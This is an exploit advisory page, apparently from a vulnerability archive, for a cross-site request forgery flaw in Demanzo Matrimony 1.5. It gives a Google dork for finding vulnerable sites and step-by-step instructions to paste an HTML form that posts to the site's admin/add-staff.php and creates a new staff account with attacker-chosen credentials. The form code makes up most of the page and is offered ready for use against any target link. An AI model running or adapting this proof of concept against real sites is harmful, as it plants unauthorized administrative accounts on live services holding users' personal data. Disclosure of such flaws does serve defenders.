Demanzo Matrimony 1.5 Cross Site Request Forgery

2023.02.19
Credit: indoushka
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

==================================================================================================================================== | # Title : Demanzo Matrimony v.1.5 CSRF Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 109.0.1(32-bit) | | # Vendor : https://demanzo.com/matrimony-site-development/ | | # Dork : Powered by ITAcumens or "Powered by Demanzo" | ==================================================================================================================================== poc : [+] infected file: add-staff.php [+] Inside folder /admin/add-staff.php [+] Dorking İn Google Or Other Search Enggine. [+] Copy the code below and paste it into an HTML file. [+] Go to the line 2. [+] Set the target site link Save changes and apply . </div> <form action="https://www.example/web/html/admin/add-staff.php" method="POST"> <div id="msg"> <div class="form-group ban_btm1 col-md-6 no_pad"> <label class="control-label col-md-4 frm_pd">Name <span class="red">*</span> : </label> <div class="col-md-8 frm_pd"> <input required="" name="name" id="name" value="" type="text" class="form-control" placeholder="Enter Name"> </div> </div> <div class="form-group ban_btm1 col-md-6 no_pad"> <label class="control-label col-md-4 frm_pd">Password <span class="red">*</span> : </label> <div class="col-md-8 frm_pd"> <input required="" name="pass" id="pass" value="" type="password" class="form-control" placeholder="Enter Password"> </div> </div> <div class="form-group ban_btm1 col-md-6 no_pad"> <label class="control-label col-md-4 frm_pd">Email ID <span class="red">*</span> : </label> <div class="col-md-8 frm_pd"> <input required="" name="email" id="email" value="" type="email" class="form-control" placeholder="Enter Email ID"> </div> </div> <div class="form-group ban_btm1 col-md-6 no_pad"> <label class="control-label col-md-4 frm_pd">Gender <span class="red">*</span> : </label> <div class="col-md-8 frm_pd"> <input type="radio" name="gender" value="Male" checked=""><label class="rd_btn">Male</label> <input type="radio" name="gender" value="Female"><label class="rd_btn">Female</label> </div> </div> <div class="form-group ban_btm1 col-md-12 no_pad"> <label class="control-label frm_pd col-md-2">Designation <span class="red">*</span> : </label> <div class="col-md-10 frm_pd"> <input required="" name="designation" value="" id="designation" type="text" class="form-control" placeholder="Enter Designation"> </div> </div> <div class="form-group ban_btm1 col-md-12 no_pad"> <label class="control-label col-md-2 frm_pd">Address <span class="red">*</span> : </label> <div class="col-md-10 frm_pd"> <textarea required="" name="address" id="address" rows="7" class="form-control" placeholder="Enter Address"></textarea> </div> </div> <!-- <div class="form-group ban_btm1 col-md-12 no_pad"> --> <!-- <label class="control-label col-md-2 frm_pd">Access Level <span class="red">*</span> : </label> --> <!-- <div class="col-md-10 frm_pd chk_box"> --> <!-- <input id="access1" type="checkbox" checked /> <label for="access1" class="col-lg-3 col-md-5 col-sm-6">All</label> --> <!-- <input id="access2" type="checkbox" /> <label for="access2" class="col-lg-4 col-md-7 col-sm-6">Manage Plan</label> --> <!-- <input id="access3" type="checkbox" /> <label for="access3" class="col-lg-5 col-md-5 col-sm-6">Manage Kootam / Kulam</label> --> <!-- <input id="access4" type="checkbox" /> <label for="access4" class="col-lg-3 col-md-7 col-sm-6">To Approve</label> --> <!-- <input id="access5" type="checkbox" /> <label for="access5" class="col-lg-4 col-md-5 col-sm-6">Manage Success Stories</label> --> <!-- <input id="access6" type="checkbox" /> <label for="access6" class="col-lg-5 col-md-7 col-sm-6">Manage Advertisement</label> --> <!-- <input id="access7" type="checkbox" /> <label for="access7" class="col-lg-3 col-md-5 col-sm-6">Manage Staff</label> --> <!-- <input id="access8" type="checkbox" /> <label for="access8" class="col-lg-4 col-md-7 col-sm-6">Manage Member</label> --> <!-- <input id="access9" type="checkbox" /> <label for="access9" class="col-lg-5 col-md-5 col-sm-6">Manage City</label> --> <!-- <input id="access10" type="checkbox" /> <label for="access10" class="col-lg-3 col-md-7 col-sm-6">Manage State</label> --> <!-- <input id="access11" type="checkbox" /> <label for="access11" class="col-lg-4 col-md-5 col-sm-6">Manage Country</label> --> <!-- <input id="access12" type="checkbox" /> <label for="access12" class="col-lg-5 col-md-7 col-sm-6">Manage Education</label> --> <!-- <input id="access13" type="checkbox" /> <label for="access13" class="col-lg-3 col-md-5 col-sm-6">Reports</label> --> <!-- <input id="access14" type="checkbox" /> <label for="access14" class="col-lg-4 col-md-7 col-sm-6">Ematch</label> --> <!-- <input id="access15" type="checkbox" /> <label for="access15" class="col-lg-5 col-md-5 col-sm-6">Advanced Search</label> --> <!-- <input id="access16" type="checkbox" /> <label for="access16" class="col-lg-3 col-md-7 col-sm-6">Group Mail</label> --> <!-- <input id="access17" type="checkbox" /> <label for="access17" class="col-lg-4 col-md-5 col-sm-6">Featured Profiles</label> --> <!-- <input id="access18" type="checkbox" /> <label for="access18" class="col-lg-5 col-md-7 col-sm-6">Upgrade / Renewal Membership</label> --> <!-- <input id="access19" type="checkbox" /> <label for="access19" class="col-lg-3 col-md-5 col-sm-6">Accounts </label> --> <!-- <input id="access20" type="checkbox" /> <label for="access20" class="col-lg-4 col-md-7 col-sm-6">Logo</label> --> <!-- <input id="access21" type="checkbox" /> <label for="access21" class="col-lg-5 col-md-5 col-sm-6">Religion</label> --> <!-- </div> --> <!-- </div> --> <!-- <div class="form-group ban_btm1 col-lg-7 col-md-12 no_pad"> --> <!-- <label class="control-label col-lg-4 col-md-2 frm_pd no_pad">IP Address Controls <span class="red">*</span> : </label> --> <!-- <div class="col-lg-8 col-md-10 frm_pd chk_box"> --> <!-- <input id="status1" type="checkbox" checked /> <label for="status1" class="col-md-4">All</label> --> <!-- <input id="status2" type="checkbox" /> <label for="status2" class="col-md-8">192.168.10.156</label> --> <!-- </div> --> <!-- </div> --> <div class="form-group ban_btm1 col-lg-5 col-md-12 no_pad"> <label class="control-label col-lg-4 col-md-2 frm_pd no_pad">Staff Status <span class="red">*</span> : </label> <div class="col-lg-8 col-md-10 frm_pd"> <input type="radio" name="status" value="0" checked=""><label class="rd_btn">Active</label> <input type="radio" name="status" value="1"><label class="rd_btn">Inactive</label> </div> </div> <div class="col-md-2 col-md-offset-5 col-sm-12"> <input type="submit" class="ctn_btn no_mt1" value="Add" name="add"> </div> Greetings to :=================================================================================== jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet| ==================================================================================================


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top